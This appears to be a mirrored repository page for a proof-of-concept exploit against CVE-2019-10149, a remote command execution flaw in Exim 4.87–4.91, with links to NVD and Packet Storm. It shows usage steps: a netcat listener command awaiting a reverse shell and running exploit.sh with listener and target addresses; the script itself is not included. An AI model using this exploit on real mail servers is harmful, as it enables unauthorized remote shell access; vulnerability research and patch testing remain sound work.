CVE-2019-10149 PoC — Exim 操作系统命令注入漏洞

Description

Remote Command Execution into shell from a vulnerable exim service.

介绍

# About 

Remote Command Execution into shell from a vulnerable exim service. <br>
Vulnerable versions go from 4.87 to 4.91 (inclusive). Check https://nvd.nist.gov/vuln/detail/cve-2019-10149. <br>
The following script is based on Qualys PoC. Check https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.


### Example
2 terminals recommended
```
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
   $ Listener IP: 192.168.0.1
   $ Listener Port: 1337
   $ Exim IP: 10.10.0.1
   $ Exim Port: 25

```

文件快照

备注